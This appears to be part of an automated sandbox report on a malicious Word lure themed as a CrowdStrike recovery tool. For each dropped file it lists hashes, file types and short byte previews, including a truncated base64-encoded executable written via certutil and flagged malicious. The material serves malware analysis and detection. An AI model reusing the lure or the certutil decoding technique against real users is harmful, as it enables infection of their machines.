        Category:dropped
        Size (bytes):20515
        Entropy (8bit):7.469835486287775
        Encrypted:false
        SSDEEP:384:Pjl/SU5NrbWwV+A9QG6F7//oMaoNy3aPWPOzROejkIQMAPZU:LrPlo1k3aPWPONjkIFAK
        MD5:747F920591F171BA793209DB3BFD8A21
        SHA1:BCF601F9500A6B5C20DB101840F4288D685FC57D
        SHA-256:74C3C074A163990B2E25692F8656F2232B9D4B07D0B34FE7A3F40127F6838CF3
        SHA-512:0D37436D7BF6BF640377525F7E2E926929B64C5D31686B4CF69083CCCDF53AC4F85F98BF380D49DE9B585055237FA9156D696C81081B676364771F2415790683
        Malicious:false
        Preview:PK..........!.+:.P............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................n.0.E.......D...(,g..6@]t.#.._.0..}......QM.l..1....5...YS.@D.].....I..[....k..U..S.x.-......7..6.V..e...'.Qn..l|.Go:..Ht..<.y%....f.....Ku..l1....6.Z...=I......0{.L.`...H..S.\.CC..op...#..O:.7....Si.VP]....K...G...rh.......$....BF.t..Z.y.]O..+...,..{.j.uZ...qB...i..i.....t.,..$-my.{...q7H..JL..{P.E..../Fq$>...FX.)...b...k..E.Ni..0C..^.P..7z`.......E<......)...G.]....9./......g...I4...g....<eI[."..4m.?.6.q..k
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:Microsoft Word 2007+
        Category:dropped
        Size (bytes):250145
        Entropy (8bit):7.9935463566733125
        Encrypted:true
        SSDEEP:6144:m00BJM20XF07Jtd0YPFKGTFHLYwgNkSagBRK3WJMLtFqFk06TOOp7uuVZpVPvG:wBJUXydtdfogBLngNMVG6xFqJ6TOOdur
        MD5:891E6C7EC5DE6384509564D8A0DEDECF
        SHA1:187994C9D8A21DD977473EF8E7A6EF4C7F2EAE52
        SHA-256:1E224B11854CE62115305CE613169DAD1C4AA59D35C8482E979532ADCA124A10
        SHA-512:27D6EF69B33A4F363E3D939EA4988A477B09F40401FF7645A6D7AA2ABDB9F7AD329C6A70B50996F27789164E5E2E4A41C12B3BACD2FB2B4EAC9486C00AD4D7E8
        Malicious:true
        Antivirus:
        • Antivirus: Joe Sandbox ML, Detection: 100%
        Preview:PK..-.......!..am.............[Content_Types].xml.......................n.0.........D...(,...6@. W.Z.t...k'~..-Eh..tj.b.".Y.....Yw..|P.l^.X.F.Z..d..../,.(L-:k.d;..z....~. d.6.d+D... W.E(..C+..Z ..-wB..-.O..g..A0.cd.......0.}..}.J..}..E....:%..2...!.M.$..J.y......[...L..f.= ..D......R....r.6.p.+....Oj.W5dw....i......M..8f8.()F....[#..hU(s.r....(.a6(...&.....AS.].......w`.m.F.xT..........{.9o%.@8..#:.".p..=7m..$.".@NFx...d)..'.4..8E7Ft2..z../.d........z..} .8....N.@...=.$..c..s?....Q.....;i....>.>..[..{...}....9...,.. ..PK..-.......!..U~............._rels/.rels......................MK.1....!.;.*"..^D.Md..C2.........(.....3y..3C....+.4xW..(A.......yX.JB....Wp.....b..#InJ......*.E..b.=[J....M.%...a .B..,o0.f@=a... n........o.A..;.N.<...v.."...e...b.R...1..R.EF..7Z.n...hY..j.y..#1'.<....7.......9m.......3...Y.. ..PK..-.......!.qq..............word/document.xml....m.......2(.......}.n........^..-.N.3I QT.M..hw.9@..E...S$./.}...;.... .G.'..*R..v.@-+.A
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:Composite Document File V2 Document, Cannot read section info
        Category:dropped
        Size (bytes):70144
        Entropy (8bit):4.6310420804504275
        Encrypted:false
        SSDEEP:384:xtT+CeCz8l15lZzNKY235JzN0jyLUt3EN+DCz8l15lZzNKY235JzPN0jyL:aCa/lZzNj235lNdOCa/lZzNj235l1d
        MD5:7911062030D6DA09593877F2B52686EC
        SHA1:04AA8A751201A7373844A0AD9CA64403FADE98DA
        SHA-256:5D9BF8B45FB2E025C833D6A12BF29CC1C7F3DE7315E57A893354C826BD5A0207
        SHA-512:162008F9523744C2DF75E2B74CAC7AE034F79E2E2EC35A8337E0CDD2393A09E8F4B711DB5E844A362917C9000DF420F1B82A9C46F55D7315D1274E9F3DD8033E
        Malicious:false
        Preview:......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................>...D...................................................................................................................................................................................................................................?...@...A...B...C...E...~.......................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):81920
        Entropy (8bit):0.0
        Encrypted:false
        SSDEEP:3::
        MD5:030A4F48DC8DB0956ADD25994004E5CA
        SHA1:D81C6AFAF95FA3886685DF4F9F7D93F4F403226C
        SHA-256:FA569E2360C540E6280E34A4627516770F1A5F34D81D35689334A99CC1013357
        SHA-512:9B844A86C0995A64A9CF163BCB58B8B1F2302E65B03CF5D90445078B0DBA11C687BBE1D94B81DB5EF52651BCC5D0B39EBFED9940D416E05A35330C17BF1E6D68
        Malicious:false
        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:Targa image data - Map 6 x 7 x 8 +4 +5 "\011"
        Category:dropped
        Size (bytes):41984
        Entropy (8bit):3.6661534757164875
        Encrypted:false
        SSDEEP:768:GxRM3+y24Zwkvp1RkxOIvMILjnOojy1TRUS7V8iOuCDSe3fsM8pp3:GxW3+54Kkvp1RkxOIvfPnOojGV8juCDG
        MD5:6156FD728E0A9488C31DF5BBC8F844BF
        SHA1:16B20A75C6113409F1E78A1B66B1E2B647713DE2
        SHA-256:07C1401BCA0B13228AFF72314F6247F60A105492B695E817EE2A784643644DA5
        SHA-512:0A56DC6F0193CE70F4DC0876FCBE7ABC53D23F8A5C80032C68F49856A16B64B3B2E4B5BBAFA384FF57F0A586A484DB1464EE65EC5454BA64DB5E23AF1B3A9A13
        Malicious:false
        Preview:................................................................ .!.".#.$.%.&.'.(.).*.+.,.-.../.0.1.2.3.4.5.6.7.8.9.:.;.<.=.>.................A.s. .a. .f.o.l.l.o.w.-.u.p. .t.o. .t.h.e. .C.r.o.w.d.S.t.r.i.k.e. .F.a.l.c.o.n. .a.g.e.n.t. .i.s.s.u.e. .i.m.p.a.c.t.i.n.g. .W.i.n.d.o.w.s. .c.l.i.e.n.t.s. .a.n.d. .s.e.r.v.e.r.s.,. .M.i.c.r.o.s.o.f.t. .h.a.s. .r.e.l.e.a.s.e.d. .a.n...u.p.d.a.t.e.d...r.e.c.o.v.e.r.y. .t.o.o.l. .w.i.t.h...t.w.o. .r.e.p.a.i.r. .o.p.t.i.o.n.s...t.o. .h.e.l.p. .I.T. .a.d.m.i.n.s. .......................................................X...........$...(.......$...(......................................................................................................................................................................................................................................................................................................................................................$..&..F...d......d...d.-D..M............[$.\$.a$.gdK.e.....$.-D..M...
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):1024
        Entropy (8bit):0.05390218305374581
        Encrypted:false
        SSDEEP:3:ol3lYdn:4Wn
        MD5:5D4D94EE7E06BBB0AF9584119797B23A
        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
        Malicious:false
        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):1024
        Entropy (8bit):0.05390218305374581
        Encrypted:false
        SSDEEP:3:ol3lYdn:4Wn
        MD5:5D4D94EE7E06BBB0AF9584119797B23A
        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
        Malicious:false
        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:Targa image data - Map 6 x 7 x 8 +4 +5 "\011"
        Category:dropped
        Size (bytes):41984
        Entropy (8bit):3.6661534757164875
        Encrypted:false
        SSDEEP:768:GxRM3+y24Zwkvp1RkxOIvMILjnOojy1TRUS7V8iOuCDSe3fsM8pp3:GxW3+54Kkvp1RkxOIvfPnOojGV8juCDG
        MD5:6156FD728E0A9488C31DF5BBC8F844BF
        SHA1:16B20A75C6113409F1E78A1B66B1E2B647713DE2
        SHA-256:07C1401BCA0B13228AFF72314F6247F60A105492B695E817EE2A784643644DA5
        SHA-512:0A56DC6F0193CE70F4DC0876FCBE7ABC53D23F8A5C80032C68F49856A16B64B3B2E4B5BBAFA384FF57F0A586A484DB1464EE65EC5454BA64DB5E23AF1B3A9A13
        Malicious:false
        Preview:................................................................ .!.".#.$.%.&.'.(.).*.+.,.-.../.0.1.2.3.4.5.6.7.8.9.:.;.<.=.>.................A.s. .a. .f.o.l.l.o.w.-.u.p. .t.o. .t.h.e. .C.r.o.w.d.S.t.r.i.k.e. .F.a.l.c.o.n. .a.g.e.n.t. .i.s.s.u.e. .i.m.p.a.c.t.i.n.g. .W.i.n.d.o.w.s. .c.l.i.e.n.t.s. .a.n.d. .s.e.r.v.e.r.s.,. .M.i.c.r.o.s.o.f.t. .h.a.s. .r.e.l.e.a.s.e.d. .a.n...u.p.d.a.t.e.d...r.e.c.o.v.e.r.y. .t.o.o.l. .w.i.t.h...t.w.o. .r.e.p.a.i.r. .o.p.t.i.o.n.s...t.o. .h.e.l.p. .I.T. .a.d.m.i.n.s. .......................................................X...........$...(.......$...(......................................................................................................................................................................................................................................................................................................................................................$..&..F...d......d...d.-D..M............[$.\$.a$.gdK.e.....$.-D..M...
        Process:C:\Windows\System32\xcopy.exe
        File Type:PE32+ executable (console) x86-64, for MS Windows
        Category:dropped
        Size (bytes):530944
        Entropy (8bit):6.426002179912066
        Encrypted:false
        SSDEEP:12288:fY/9QPTCgxPjg26sSS4x0WZ40lNYgBOJDN3NlhBATWStJ:geLCY0mSSxWG0lN1O7rA6StJ
        MD5:EAC53DDAFB5CC9E780A7CC086CE7B2B1
        SHA1:C9ECDE4DE3C60F99C69BBCA4332F4162E0BF252F
        SHA-256:D76D08C04DFA434DE033CA220456B5B87E6B3F0108667BD61304142C54ADDBE4
        SHA-512:1B04B40D36B6CDCB805C720341A21885594B9C7BAEAD0A6CC56E7F6CC1ACDFDB2522C12276B0973EAF2911A6D2A105DEFC27D48E574A6F87A11BFACCACF65E3F
        Malicious:false
        Antivirus:
        • Antivirus: ReversingLabs, Detection: 0%
        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1.{MPq(MPq(MPq(+?.(FPq(.%t)kPq(.%u)BPq(.%r)GPq(D(.(.Pq(>2p)DPq(MPp(.Pq(.%y).Pq(.%.(LPq(.%s)LPq(RichMPq(........PE..d...J.~b.........."..........\.................@.............................`......[.....`.................................................H...4....@..@........(...........P..........T..............................8............................................text............................... ..`.rdata..............................@..@.data...`...........................@....pdata...(.......*..................@..@_RDATA.......0......................@..@.rsrc...@....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................
        Process:C:\Windows\System32\certutil.exe
        File Type:PEM certificate
        Category:dropped
        Size (bytes):730108
        Entropy (8bit):5.445175115010181
        Encrypted:false
        SSDEEP:12288:sbWG2aZxq0mOWBsfuZ6/D7ilVVMvk43mw:siG2RvOWB8ui7kVVEB
        MD5:6CD8C188A2B0A5A11B2F02648B675874
        SHA1:11F8F207DA2F2B64E8A978B37BC091DA25B380C4
        SHA-256:B27A847F5059294E8E6F9C8B939C0437173C73E0194CF03CDCE4092A025B0C8F
        SHA-512:8C83E985C44F63E382CCFE64662D3E54137A4ADE7C0EE9BC409095F0631D471BFEF7A00FB8E6073CAFDD9ACAA8E241BACEC934AE1430728749002882D2BE366B
        Malicious:true
        Preview:-----BEGIN CERTIFICATE-----..TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAAAAAAA8AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5v..dCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAAJMR97TVBxKE1QcShNUHEo..Kz+MKEZQcSgfJXQpa1BxKB8ldSlCUHEoHyVyKUdQcShEKOIoAVBxKD4ycClEUHEo..TVBwKKVQcSiMJXkp3FBxKIwljihMUHEojCVzKUxQcShSaWNoTVBxKAAAAAAAAAAA..UEUAAGSGBwBKtn5iAAAAAAAAAADwACIACwIOHQDIBQAAXAIAAAAAABC3BQAAEAAA..AAAAQAEAAAAAEAAAAAIAAAYAAAAAAAAABgAAAAAAAAAAYAgAAAQAAFsXCQADAGDB..AAAQAAAAAAAAEAAAAAAAAAAAEAAAAAAAABAAAAAAAAAAAAAAEAAAAAAAAAAAAAAA..SMoHADQDAAAAQAgAQAcAAAAACACYKAAAAAAAAAAAAAAAUAgA8A8AAICjBwBUAAAA..AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4KMHADgBAAAAAAAAAAAAAADgBQAQCAAA..AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAAAAxwUAABAAAADIBQAABAAA..AAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAAjAcCAADgBQAACAIAAMwFAAAAAAAAAAAA..AAAAAEAAAEAuZGF0YQAAAGAPAAAA8AcAAAIAAADUBwAAAAAAAAAAAAAAAABAAADA..LnBkYXRhAACYKAAAAAAIAAAqAAAA1gcAAAAAAAAAAAAAAAAAQAAAQF9SREFUQQAA../AAAAAAwCAAAAgAAAAAIAAAAAAAAAAAAAAAAAEAAAEAucnN
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:GIF image data, version 89a, 15 x 15
        Category:dropped
        Size (bytes):663
        Entropy (8bit):5.949125862393289
        Encrypted:false
        SSDEEP:12:PlrojAxh4bxdtT/CS3wkxWHMGBJg8E8gKVYQezuYEecp:trPsTTaWKbBCgVqSF
        MD5:ED3C1C40B68BA4F40DB15529D5443DEC
        SHA1:831AF99BB64A04617E0A42EA898756F9E0E0BCCA
        SHA-256:039FE79B74E6D3D561E32D4AF570E6CA70DB6BB3718395BE2BF278B9E601279A
        SHA-512:C7B765B9AFBB9810B6674DBC5C5064ED96A2682E78D5DFFAB384D81EDBC77D01E0004F230D4207F2B7D89CEE9008D79D5FBADC5CB486DA4BC43293B7AA878041
        Malicious:false
        Preview:GIF89a....w..!..MSOFFICE9.0.....sRGB......!..MSOFFICE9.0.....msOPMSOFFICE9.0Dn&P3.!..MSOFFICE9.0.....cmPPJCmp0712.........!.......,....................'..;..b...RQ.xx..................,+................................yy..;..b.........................qp.bb..........uv.ZZ.LL.......xw.jj.NN.A@....zz.mm.^_.........yw........yx.xw.RR.,*.++............................................................................................................................................................................................................8....>.......................4567...=..../0123.....<9:.()*+,-.B.@...."#$%&'....... !............C.?....A;<...HT(..;
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:GIF image data, version 89a, 15 x 15
        Category:dropped
        Size (bytes):663
        Entropy (8bit):5.949125862393289
        Encrypted:false
        SSDEEP:12:PlrojAxh4bxdtT/CS3wkxWHMGBJg8E8gKVYQezuYEecp:trPsTTaWKbBCgVqSF
        MD5:ED3C1C40B68BA4F40DB15529D5443DEC
        SHA1:831AF99BB64A04617E0A42EA898756F9E0E0BCCA
        SHA-256:039FE79B74E6D3D561E32D4AF570E6CA70DB6BB3718395BE2BF278B9E601279A
        SHA-512:C7B765B9AFBB9810B6674DBC5C5064ED96A2682E78D5DFFAB384D81EDBC77D01E0004F230D4207F2B7D89CEE9008D79D5FBADC5CB486DA4BC43293B7AA878041
        Malicious:false
        Preview:GIF89a....w..!..MSOFFICE9.0.....sRGB......!..MSOFFICE9.0.....msOPMSOFFICE9.0Dn&P3.!..MSOFFICE9.0.....cmPPJCmp0712.........!.......,....................'..;..b...RQ.xx..................,+................................yy..;..b.........................qp.bb..........uv.ZZ.LL.......xw.jj.NN.A@....zz.mm.^_.........yw........yx.xw.RR.,*.++............................................................................................................................................................................................................8....>.......................4567...=..../0123.....<9:.()*+,-.B.@...."#$%&'....... !............C.?....A;<...HT(..;
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:13 2023, mtime=Fri Aug 11 15:42:13 2023, atime=Mon Jul 22 12:51:17 2024, length=250145, window=hide
        Category:dropped
        Size (bytes):1299
        Entropy (8bit):4.58294566129774
        Encrypted:false
        SSDEEP:24:83C1z/XT4lopZGYcPxD/juxNeMuYZscPxD/juvDv3q8k7N:8sz/XTk8HclWVuYZsclp8iN
        MD5:8080A08A9762D4028FCFCD91E287A9A6
        SHA1:DCF3276796F1F251023389829C817EEF32BE9771
        SHA-256:9A68761F2A1D1574751C6C3E59C30A8BB361102A2F17F0F9F54133A1992CE3DD
        SHA-512:7DC5A94218F8042B645EB906324F56ADE093E4D6EFFD5E09E80062E39AFC1CCDBBE32CB7E26398714CA2D61E305A013F34A26B78656CB1AE869135245497709A
        Malicious:false
        Preview:L..................F.... .......r.......r.....9>...!.......................A....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Xfn..user.8......QK.X.Xfn*...&=....U...............A.l.b.u.s.....z.1......Xjn..Desktop.d......QK.X.Xjn*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.!....Xin .NEW_RE~1.DOC..........WG..WG.*.........................N.e.w._.R.e.c.o.v.e.r.y._.T.o.o.l._.t.o._.h.e.l.p._.w.i.t.h._.C.r.o.w.d.S.t.r.i.k.e._.i.s.s.u.e._.i.m.p.a.c.t.i.n.g._.W.i.n.d.o.w.s...d.o.c.m.......................-...8...[............?J......C:\Users\..#...................\\910646\Users.user\Desktop\New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm.^.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.N.e.w._.R.e.c.o.v.e.r.y._.T.o.o.l._.t.o._.h.e.l.p._.w.i.t.h._.C.r.o.w.d.S.t.r.i.k.e._.i.s.s.u.e._.i.m.p.a.c.t.i.n.g._.W.
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:Generic INItialization configuration [folders]
        Category:modified
        Size (bytes):167
        Entropy (8bit):4.781242661256441
        Encrypted:false
        SSDEEP:3:HgA5AgFis6NAb6SQomZuMigIubNJYCm4wAgFis6NAb6SQomZuMigIubNJYCv:HFTFipAb6WmZuMiYbNWJFipAb6WmZuM3
        MD5:87E4B3E63F6FD43B41CB6BC643DAA68C
        SHA1:624BF01A26B59C2888129E771AF3579FFF15934F
        SHA-256:A496015FB1BF4656E45CB323ADEFB73534FA599934A83E4EB8CDEC9751A98353
        SHA-512:22B0BEE3C94F3C2AF4664ECD0D151312E13F64EC960C1D7FE2736BE249762E255ABC1B9ED5CA88BCB13D5934BAFD1D723CC6ABF4F8559B4D0B8E3572F9AB2E9E
        Malicious:false
        Preview:[misc]..New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.LNK=0..[folders]..New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.LNK=0..
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):162
        Entropy (8bit):2.4797606462020307
        Encrypted:false
        SSDEEP:3:vrJlaCkWtVyYyBS0JilXMWvk1c6nlln:vdsCkWtIJiRk3l
        MD5:C4615A023DC40AFFAEAE6CF07410BB43
        SHA1:AAE1D68C4082CABF6AEA71C7981F32928CE01843
        SHA-256:103F860A912CF17B87A169B2768635758E8A0B82EB986A0C42FEA974F91BCB1E
        SHA-512:CD6975EAE1DA934094AC2516D095D50F2EE311CF549C8AEA2F3D65074B0DFC2908F72703B46A4C012358817289C76B15AC0E39EE359BCF39A45A8C912DCB2AAD
        Malicious:false
        Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:Unicode text, UTF-16, little-endian text, with no line terminators
        Category:dropped
        Size (bytes):2
        Entropy (8bit):1.0
        Encrypted:false
        SSDEEP:3:Qn:Qn
        MD5:F3B25701FE362EC84616A93A45CE9998
        SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
        SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
        SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
        Malicious:false
        Preview:..
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):162
        Entropy (8bit):2.4797606462020307
        Encrypted:false
        SSDEEP:3:vrJlaCkWtVyYyBS0JilXMWvk1c6nlln:vdsCkWtIJiRk3l
        MD5:C4615A023DC40AFFAEAE6CF07410BB43
        SHA1:AAE1D68C4082CABF6AEA71C7981F32928CE01843
        SHA-256:103F860A912CF17B87A169B2768635758E8A0B82EB986A0C42FEA974F91BCB1E
        SHA-512:CD6975EAE1DA934094AC2516D095D50F2EE311CF549C8AEA2F3D65074B0DFC2908F72703B46A4C012358817289C76B15AC0E39EE359BCF39A45A8C912DCB2AAD
        Malicious:false
        Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
        Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
        Category:dropped
        Size (bytes):25518
        Entropy (8bit):7.981260120775725
        Encrypted:false
        SSDEEP:768:OxBz7hEdHHosjJeGrv2gsHrSe1fLKnHfzz:OxBz7YosjMGOgsJ1jyn
        MD5:9C4B364491E6AF11CC33DF28C33C4216
        SHA1:4A0F078995949E9FC29BCE9437EB902BB32D462B
        SHA-256:30C65E1E9879FE37A4A18DC8B4887C4DFE3BA29E89885D9FE61365869E93CFFD
        SHA-512:AD395F489DF5C4388221734755AB7D7FDA6DB902F3E56A35B29FFC15D3D778298BD6CD24FAF3AB9CC53BDB1099617A72C95F3759DB4393875E14E3EC9A324279
        Malicious:false
        Preview:PK........4P.X....(..Xi......ADKLicenseAgreement.rtf.}ko.H..~6.....@W.Tj.l.].X.mU..].G....}.......a........|.R.=.;..........q".t.X..2.....~....V..lz+.l.....p.w....?V.......V..vV.........x.v..W../^.2.{..tqPz.....g6....4..4`....s.....X....`.{...[m}...j.D.W.jpv.......04..g..?...0..r..wV...=.../Ah.......!...~..........vk...e....OS......{..............T..Vl..^..pU.._.U.G..UO..6$.p..8......8Tn..v..._..z...P.:.w.Ug6.......L..=q..S-.#.ULe./M/rC.).V.=..{P}....a...G.w.U.}..~.]....m>rk.c.^.............4..}(.V{.@% ......4.5...A..}.]...w....|...fv5.]L.r:..@..'_f..w_.l.XL..O..%..^......W...l..L.......H.j.`..B.z.c........}o.c...]...k.....m..d.'6..[......'q..`....v..{..|q..<..........._..F|t.zF...=!..r4......O../..q.\.c.....R~._....'...<cp..M._.._..#kDZ........~y...../..a0.....^.<8....&.pv...F....b|.i....\.GM...]..........b.0G....f.&...E.V.a.0...h.........W...2JP*I.w~.7...I}.....W.A.G..f.E.s02E.U......:..{.a.\......).eQ..^K...R..E...*.... ..C.@r....UO
        Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
        Category:dropped
        Size (bytes):25518
        Entropy (8bit):7.981260120775725
        Encrypted:false
        SSDEEP:768:OxBz7hEdHHosjJeGrv2gsHrSe1fLKnHfzz:OxBz7YosjMGOgsJ1jyn
        MD5:9C4B364491E6AF11CC33DF28C33C4216
        SHA1:4A0F078995949E9FC29BCE9437EB902BB32D462B
        SHA-256:30C65E1E9879FE37A4A18DC8B4887C4DFE3BA29E89885D9FE61365869E93CFFD
        SHA-512:AD395F489DF5C4388221734755AB7D7FDA6DB902F3E56A35B29FFC15D3D778298BD6CD24FAF3AB9CC53BDB1099617A72C95F3759DB4393875E14E3EC9A324279
        Malicious:true
        Preview:PK........4P.X....(..Xi......ADKLicenseAgreement.rtf.}ko.H..~6.....@W.Tj.l.].X.mU..].G....}.......a........|.R.=.;..........q".t.X..2.....~....V..lz+.l.....p.w....?V.......V..vV.........x.v..W../^.2.{..tqPz.....g6....4..4`....s.....X....`.{...[m}...j.D.W.jpv.......04..g..?...0..r..wV...=.../Ah.......!...~..........vk...e....OS......{..............T..Vl..^..pU.._.U.G..UO..6$.p..8......8Tn..v..._..z...P.:.w.Ug6.......L..=q..S-.#.ULe./M/rC.).V.=..{P}....a...G.w.U.}..~.]....m>rk.c.^.............4..}(.V{.@% ......4.5...A..}.]...w....|...fv5.]L.r:..@..'_f..w_.l.XL..O..%..^......W...l..L.......H.j.`..B.z.c........}o.c...]...k.....m..d.'6..[......'q..`....v..{..|q..<..........._..F|t.zF...=!..r4......O../..q.\.c.....R~._....'...<cp..M._.._..#kDZ........~y...../..a0.....^.<8....&.pv...F....b|.i....\.GM...]..........b.0G....f.&...E.V.a.0...h.........W...2JP*I.w~.7...I}.....W.A.G..f.E.s02E.U......:..{.a.\......).eQ..^K...R..E...*.... ..C.@r....UO
        Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
        Category:dropped
        Size (bytes):25518
        Entropy (8bit):7.981260120775725
        Encrypted:false
        SSDEEP:768:OxBz7hEdHHosjJeGrv2gsHrSe1fLKnHfzz:OxBz7YosjMGOgsJ1jyn
        MD5:9C4B364491E6AF11CC33DF28C33C4216
        SHA1:4A0F078995949E9FC29BCE9437EB902BB32D462B
        SHA-256:30C65E1E9879FE37A4A18DC8B4887C4DFE3BA29E89885D9FE61365869E93CFFD
        SHA-512:AD395F489DF5C4388221734755AB7D7FDA6DB902F3E56A35B29FFC15D3D778298BD6CD24FAF3AB9CC53BDB1099617A72C95F3759DB4393875E14E3EC9A324279
        Malicious:false
        Preview:PK........4P.X....(..Xi......ADKLicenseAgreement.rtf.}ko.H..~6.....@W.Tj.l.].X.mU..].G....}.......a........|.R.=.;..........q".t.X..2.....~....V..lz+.l.....p.w....?V.......V..vV.........x.v..W../^.2.{..tqPz.....g6....4..4`....s.....X....`.{...[m}...j.D.W.jpv.......04..g..?...0..r..wV...=.../Ah.......!...~..........vk...e....OS......{..............T..Vl..^..pU.._.U.G..UO..6$.p..8......8Tn..v..._..z...P.:.w.Ug6.......L..=q..S-.#.ULe./M/rC.).V.=..{P}....a...G.w.U.}..~.]....m>rk.c.^.............4..}(.V{.@% ......4.5...A..}.]...w....|...fv5.]L.r:..@..'_f..w_.l.XL..O..%..^......W...l..L.......H.j.`..B.z.c........}o.c...]...k.....m..d.'6..[......'q..`....v..{..|q..<..........._..F|t.zF...=!..r4......O../..q.\.c.....R~._....'...<cp..M._.._..#kDZ........~y...../..a0.....^.<8....&.pv...F....b|.i....\.GM...]..........b.0G....f.&...E.V.a.0...h.........W...2JP*I.w~.7...I}.....W.A.G..f.E.s02E.U......:..{.a.\......).eQ..^K...R..E...*.... ..C.@r....UO
        Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
        Category:downloaded
        Size (bytes):25518
        Entropy (8bit):7.981260120775725
        Encrypted:false
        SSDEEP:768:OxBz7hEdHHosjJeGrv2gsHrSe1fLKnHfzz:OxBz7YosjMGOgsJ1jyn
        MD5:9C4B364491E6AF11CC33DF28C33C4216
        SHA1:4A0F078995949E9FC29BCE9437EB902BB32D462B
        SHA-256:30C65E1E9879FE37A4A18DC8B4887C4DFE3BA29E89885D9FE61365869E93CFFD
        SHA-512:AD395F489DF5C4388221734755AB7D7FDA6DB902F3E56A35B29FFC15D3D778298BD6CD24FAF3AB9CC53BDB1099617A72C95F3759DB4393875E14E3EC9A324279
        Malicious:false
        URL:https://download.microsoft.com/download/8/e/1/8e189885-12fe-4ebe-895d-b2d5a08aae65/MsftRecoveryToolForCSv2.zip
